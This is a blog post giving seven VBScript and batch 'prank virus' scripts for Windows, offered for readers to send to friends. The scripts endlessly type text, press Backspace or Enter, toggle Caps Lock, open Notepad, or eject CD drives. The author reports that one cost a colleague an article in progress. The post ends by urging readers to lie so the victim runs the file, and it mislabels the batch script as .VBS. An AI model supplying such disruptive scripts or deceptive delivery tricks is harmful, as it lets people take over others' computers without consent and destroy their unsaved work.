Simple Hacks and virus codes to Prank your Friends


After my first article about Prank Your Friends i got more pm to post more pranks and some better stuff. first of all i must say please use comment section or chat box to give your suggestions and comments. So others will also might give their ideas and suggestions for you. Read My first Prank article from this link. try it if you havn't read it yet.


Most massages told me that they loved that post and the video embedded and they need more technical stuff than those loose pranks. Thats true. but the real fun comes when someone got pranked by a simple trick and he couldn't realize whats going on. anyways as you requested im posting real technical stuff. guess what. most of people read this are going to code their own first virus. most of them will not get caught by antivirus programs. because we don't go to windows file management or security level. and those codes are not harmful. please don't pm and ask harmful codes now :P   i know most of people will do it if i didn't mention it here.

You don't need any softwares or compilers. just use notepad and when save select file type ass "All files".


First Code

Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Trickhunters.VBS" and send it.
You can replace the word You are a fool as you wish

Second Code
 
Open Notepad continually in your friend's computer:
Type :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Trickhunters.VBS" and send it.

Third Code

Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.
This is the best one and i enjoyed it well with friends. I pranked one of my blog writer mate.and he lost an article that he was writing more than half hours. :D got a pm with lots of bad words. lol

Fourth Code
Open Notepad, slowly type "Hello, You were hacked by Trick Hunters Thank you xD" and freak your friend out:
Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", You"
WScript.Sleep 500
WshShell.SendKeys "were"
WScript.Sleep 500
WshShell.SendKeys " hac "
WScript.Sleep 500
WshShell.SendKeys "ked "
WScript.Sleep 500
WshShell.SendKeys "by"
WScript.Sleep 500
WshShell.SendKeys " Tri"
WScript.Sleep 500
WshShell.SendKeys "ck"
WScript.Sleep 500
WshShell.SendKeys " Hun"
WScript.Sleep 500
WshShell.SendKeys "ters"
WScript.Sleep 500
WshShell.SendKeys " Thank You"
WScript.Sleep 500
WshShell.SendKeys " xD"

Save it as "TrickHunters.VBS" and send it.

Fifth Code
Toggle your friend's Caps Lock button simultaneously:
Type :


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Trickhunters.VBS" and send it.

SixthCode

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Trickhunters.VBS" and send it.
this also good for check your CD/DVD drive tray.

Seventh Code
This also awesome. it won't stop. hard to stop also
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Trickhunters.VBS" and send it.

Anytime you can stop these scrips by pressing ALT+CTRL+DELETE and go to task manager then select process tab and close wscripts.exe Tell a lie about this file to your friend. make him trust this file and double click it. Good luck with pranking :D

High quality picture, Click to zoom

Watch my old pranking post from here...

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Related Posts Plugin for WordPress, Blogger...